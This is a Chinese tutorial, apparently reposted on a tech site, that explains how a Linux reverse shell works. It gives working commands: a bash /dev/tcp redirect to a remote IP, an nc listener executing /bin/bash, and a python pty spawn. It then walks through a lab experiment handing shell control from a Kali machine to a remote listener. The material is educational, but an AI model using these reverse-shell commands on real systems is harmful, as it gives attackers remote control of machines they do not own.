在线时间:8:00-16:00
迪恩网络APP
随时随地掌握行业动态
扫描二维码
关注迪恩网络微信公众号
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 实验 通过一个小实验帮助大家理解 第一步,将shell的正确输出重定向到外部主机 假设我们在kali上输入的命令为: 在mac上监听端口命令为:nc -l 9999 首先在kali上输入whoami命令,发现没有回显,因为回显被重定向到了mac上。 但是当我们在kali上出入错误命令的时候,却存在回显。 第二步,将错误输出重定向到外部主机 我们只需要在上面的命令后面加上 2>&1即可,意思为将错误输出重定向到标准输出上,也就是重定向到我们的外部主机。 这时候发现在kali上按键盘已经没有任何回显了,回显全部出现在了mac的shell上: 这是因为我们已经将所有的输出都重定向到了外部主机上,但问题是现在我们的控制权还在kali上,mac无法进行任何输出操作,只能显示输出。这时候我们几句需要将输入的权限给予我们的mac。 第三步,交出输入权限 只需要在第二步命令的基础上加上 0>&1即可。 这时候已经可以在mac上完全控制kali的shell了,实验结束。 其他 当shell不稳定时候用python的虚拟化终端: python -c "import pty;pty.spawn('/bin/bash')" 参考: 到此这篇关于linux反弹shell的原理详解的文章就介绍到这了,更多相关linux反弹shell内容请搜索极客世界以前的文章或继续浏览下面的相关文章希望大家以后多多支持极客世界! |
请发表评论